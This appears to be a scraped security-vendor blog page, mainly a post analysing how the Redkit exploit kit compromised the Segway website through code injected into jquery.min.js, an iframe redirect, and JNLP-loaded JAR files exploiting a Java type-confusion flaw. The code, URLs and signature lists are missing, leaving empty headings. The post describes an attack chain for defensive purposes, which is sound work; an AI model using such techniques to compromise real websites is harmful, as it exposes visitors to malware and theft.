Short, sharp spam attacks aiming to spread Dyre financial malware
Spammers linked to the Cutwail botnet are trying to steal financial information by infecting users with Downloader.Upatre and Infostealer.Dyranges.Read More
Spammers linked to the Cutwail botnet are trying to steal financial information by infecting users with Downloader.Upatre and Infostealer.Dyranges.Read More
国際的な法執行機関により、金銭詐取を目的としたボットネットや Cryptolocker ランサムウェアネットワークの背後にいる攻撃グループが所有している大規模なインフラが押収されました。
Large swathes of infrastructure owned by the attackers behind the financial fraud botnet and Cryptolocker ransomware network seized by authorities.
Read more…
Large swathes of infrastructure owned by the attackers behind the financial fraud botnet and Cryptolocker ransomware network seized by authorities.
Read more…
On June 26, we observed an exploit kit attack on the Segway website. Symantec has notified Segway about the attack and Segway has since taken steps to ensure their website is no longer compromised. This blog will look at the details of an attack using the Redkit exploit kit.
Code is injected into a jQuery script.
Figure 1. jQuery script with code injection
The malicious code is present in the jquery.min.js JavaScript.
Figure 2. Malicious code in jquery.min.js
The injected JavaScript decodes to a malicious iframe, which redirects to a landing page. This also sets up a cookie after the redirection so that users are not compromised more than once.
Decodes to:
Figure 3. JavaScript decodes to a malicious iframe
The iframe redirects to a Redkit landing page:
The landing page loads the Java Network Launch Protocol (JNLP) to call the malicious JAR files. On successful exploitation, the JAR files use “Open Connection” and receives the URL from “param value=” in an obfuscated manner.
Figure 4. Obfuscated URL received from “param value=”
The encoded string resolves to:
The JNLP script is used to deploy malicious JAR files on user’s computer.
Figure 5. JNLP script used to deploy malicious JAR files
The URI for the JAR files:
Current JAR file names are two characters long, such as 80.jar, sj.jar, and 7t.jar. These JAR files download an encrypted payload and employ cipher schemes to decrypt it.
The JAR files used in this attack use a Java type confusion vulnerability (CVE-2012-1723)
Figure 6. Java type confusion being exploited
The cipher scheme used to decode the URL, passed as param through JNLP, is a simple character substitution algorithm.
Figure 7. Cipher scheme used to decode URL
Several pieces of malware are dropped in this attack:
Figure 8. Attack scenario
Redkit has been available since early 2012 and still propagates in the same way: Hacked sites with a malicious iframe redirect to the exploit kit landing page, as we have observed in this case, and then plugin detect scripts are used for fingerprinting just like other exploit kits.
Recently, we have observed landing pages with the following URI patterns:
Redkit has started deploying JAR files using JNLP script as a plugin to load them. The dropped JAR files have numbered names such as 11.jar or 123.jar. The JAR files are obfuscated and exploit the latest Java vulnerabilities. The payload for these files is encrypted.
Redkit exploits several Java vulnerabilities:
Redkit is known to drop:
Symantec blocked approximately 150,000 Redkit attacks last month.
Figure 9. Geographical distribution of attacks
North American, European, and USSR regions are the most affected geographical areas. The motive for these attacks is generally compromising users for monetary benefits. Recently, these attacks have targeted organizations in order to steal intellectual property.
The good news is that Symantec provides comprehensive protection for Redkit attacks, and customers with updated intrusion prevention and antivirus signatures are protected. Intrusion Prevention scans all the network traffic that enters and exits your computer and compares this information against a set of attack signatures, protecting users against the most common Internet attacks.
Symantec has the following protection in place to protect customers from this attack:
Intrusion prevention:
Antivirus: